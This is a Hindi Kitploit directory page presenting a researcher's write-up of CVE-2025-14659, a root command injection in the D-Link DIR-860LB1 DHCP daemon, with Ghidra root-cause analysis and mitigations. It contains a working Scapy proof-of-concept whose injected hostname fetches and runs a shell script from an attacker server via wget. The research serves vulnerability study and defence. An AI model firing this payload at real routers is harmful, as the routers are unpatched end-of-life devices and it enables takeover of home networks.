Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vulnerability-DLink-CVE-2025-14659 — स्थिर विश्लेषण (Ghidra) और कस्टम पैकेट-क्राफ्टिंग (Scapy) जो D-Link फर्मवेयर में रूट-स्तरीय DHCP कमांड इंजेक्शन भेद्यता (CVE-2025-14659) का प्रदर्शन करता है | Kitploit
उपकरण/GitHubGitHub/peterlinccl/vulnerability-dlink-cve-2025-14659
एम्बेडेड सिस्टम सुरक्षास्थैतिक विश्लेषणIoT सुरक्षाभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगपेपर और शोधपेलोड डेवलपमेंटफर्मवेयर विश्लेषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubpeterlinccl/vulnerability-dlink-cve-2025-14659

Vulnerability-DLink-CVE-2025-14659

स्थिर विश्लेषण (Ghidra) और कस्टम पैकेट-क्राफ्टिंग (Scapy) जो D-Link फर्मवेयर में रूट-स्तरीय DHCP कमांड इंजेक्शन भेद्यता (CVE-2025-14659) का प्रदर्शन करता है

रिपॉजिटरी देखें
14घं 22मि पहलेअभी तक समीक्षित नहीं

CVE-2025-14659: D-Link DHCP डेमन कमांड इंजेक्शन विश्लेषण

CVE प्रोजेक्ट पुनः बनाएं | आक्रामक सुरक्षा

लेखक: Peter Lin
दिनांक: मई 2026
प्रोजेक्ट पिच: CVE-2025-14659 ने फर्मवेयर v203b03 चलाने वाले D-Link DIR-860LB1 वायरलेस राउटर में मौजूद DHCP डेमन घटक को लक्षित करने वाली एक कमांड इंजेक्शन भेद्यता की रिपोर्ट की। यह कमांड इंजेक्शन एक हमलावर को तब इस लक्षित राउटर पर root विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करने की अनुमति दे सकता है जब कोई DHCP क्लाइंट किसी दुर्भावनापूर्ण होस्टनाम के साथ मौजूदा लीज़ का नवीनीकरण करता है। मैं DIR-860LB1 डिवाइस का फर्मवेयर निकालूंगा और Ghidra का उपयोग करके स्थिर विश्लेषण के माध्यम से DHCP डेमन (udhcpd) में मौजूद खामी की पहचान करूंगा। फिर मैं FirmAE जैसे एमुलेशन इंजन का उपयोग करके इस राउटर के वातावरण का एमुलेशन करूंगा, और इस लक्ष्य के विरुद्ध एक प्रूफ ऑफ कॉन्सेप्ट हमले का प्रदर्शन करूंगा।


🔍 भेद्यता अवलोकन

  • CVE ID: CVE-2025-14659
  • CVSS स्कोर: 8.7 (उच्च)
  • भेद्यता प्रकार: CWE-77 (कमांड इंजेक्शन)
  • लक्षित बाइनरी: udhcpd (DHCP डेमन)
  • प्रभाव: स्थानीय नेटवर्क पर अनधिकृत root पहुंच।

🔬 मूल कारण (Ghidra स्थिर विश्लेषण)

Ghidra में udhcpd_main फ़ंक्शन को देखने पर, भेद्यता ठीक case 3 (DHCPREQUEST) ब्लॉक के अंदर मौजूद है:

  1. निष्कर्षण: डेमन get_option(auStack_254, 0xc) का उपयोग करके क्लाइंट पैकेट से DHCP विकल्प 12 (होस्टनाम) निकालता है।
  2. संयोजन: यदि कोई होस्टनाम मौजूद है, तो उसे sprintf() के माध्यम से सीधे एक स्ट्रिंग बफ़र में डाल दिया जाता है:
    root@kitploit:~
    sprintf(acStack_454,"usockc /var/mydlinkeventd_usock NEW_DEVICE,%s,%s,%s\n", acStack_5f4, pcVar15, piVar12);
    
  3. निष्पादन: इसके बाद एप्लिकेशन उस कच्चे बफ़र को शेल वर्णों को साफ़ किए बिना सीधे system() कॉल में पास कर देता है:
    root@kitploit:~
    system(acStack_454);
    

चूंकि डेमन root के रूप में चलता है, होस्टनाम में शेल मेटाकैरेक्टर (जैसे ; या |) जोड़ने से एक हमलावर मनमाने सिस्टम कमांड निष्पादित कर सकता है।


🛠️ प्रूफ ऑफ कॉन्सेप्ट स्क्रिप्ट (cve_poc.py)

यह कार्यात्मक Scapy स्क्रिप्ट एक दुर्भावनापूर्ण क्लाइंट का अनुकरण करती है जो इंजेक्ट किए गए होस्टनाम पेलोड के साथ लीज़ नवीनीकरण का अनुरोध करता है:

root@kitploit:~
from scapy.all import *

# ===== Configuration =====
iface = "tap1_0"                          
mac_address = "0a:6f:8c:38:03:52"        
requested_ip = "192.168.0.150"            
dhcp_server_ip = "192.168.0.1"            
attacker_server = "192.168.0.150:12345"   
# =========================

# Injected Hostname Payload
hostname = f"; wget http://{attacker_server}/exploit.sh ; sh exploit.sh ;"
mac_bytes = bytes.fromhex(mac_address.replace(":", ""))

dhcp_request = (
    Ether(src=mac_address, dst="ff:ff:ff:ff:ff:ff") /
    IP(src="0.0.0.0", dst="255.255.255.255") /
    UDP(sport=68, dport=67) /
    BOOTP(chaddr=mac_bytes, xid=0x81de4932) /   
    DHCP(options=[
        ("message-type", "request"),
        ("requested_addr", requested_ip),
        ("server_id", dhcp_server_ip),
        ("hostname", hostname),
        "end"
    ])
)

print("[*] Sending malicious DHCP REQUEST...")
sendp(dhcp_request, iface=iface, verbose=True)
print("[*] Packet sent. Check HTTP server logs.")

⚠️ वास्तविक दुनिया में खतरे का प्रभाव

यदि वास्तविक दुनिया में इसका शोषण किया जाता है, तो एक हमलावर इस भेद्यता का उपयोग निम्नलिखित के लिए कर सकता है:

  • बॉटनेट तैनाती: हार्डवेयर को DDoS नेटवर्क में शामिल करने के लिए दुर्भावनापूर्ण बाइनरी को सीधे राउटर की अस्थिर मेमोरी (/tmp) में इंस्टॉल करना।
  • DNS हाईजैकिंग: स्थानीय उपयोगकर्ताओं को चुपचाप दुर्भावनापूर्ण फ़िशिंग साइटों की ओर रूट करने के लिए आंतरिक DNS सेटिंग्स को ओवरराइट करना।
  • पार्श्व गतिविधि: स्थानीय नेटवर्क के भीतर अन्य मशीनों को स्कैन और लक्षित करने के लिए समझौता किए गए एज राउटर को आंतरिक पिवट पॉइंट के रूप में उपयोग करना।
  • स्थायी नियंत्रण: स्थानीय वातावरण में अनधिकृत प्रशासनिक पहुंच बनाए रखने के लिए बैकडोर इंस्टॉल करना या कॉन्फ़िगरेशन फ़ाइलों में हेरफेर करना।

🛑 रक्षात्मक शमन उपाय

  • हार्डवेयर जीवनचक्र चेतावनी: D-Link ने DIR-860LB1 उपकरण को एंड-ऑफ-लाइफ (EoL) स्थिति के रूप में वर्गीकृत किया है। इस समस्या के समाधान के लिए आधिकारिक विक्रेता पैच की अपेक्षा नहीं की जाती है।
  • प्रतिपूरक सुरक्षा नियंत्रण:
    • DHCP एंडपॉइंट्स की अनधिकृत दृश्यता को सीमित करने के लिए सख्त क्लाइंट आइसोलेशन सुविधाओं से सुसज्जित पृथक VLAN सीमाओं को कॉन्फ़िगर करें।
    • EoL लीगेसी रूटिंग उपकरणों को व्यवस्थित रूप से बंद करें और सक्रिय रूप से समर्थित हार्डवेयर कॉन्फ़िगरेशन में अपग्रेड करें।

📚 संदर्भ

  • NIST National Vulnerability Database
  • CVEDetails Vulnerability Profile

अस्वीकरण: यह प्रोजेक्ट पूरी तरह से शैक्षिक उद्देश्यों, पोर्टफोलियो निर्माण, और रक्षात्मक सुरक्षा अनुसंधान के लिए बनाया गया है।

टूल डाउनलोड करें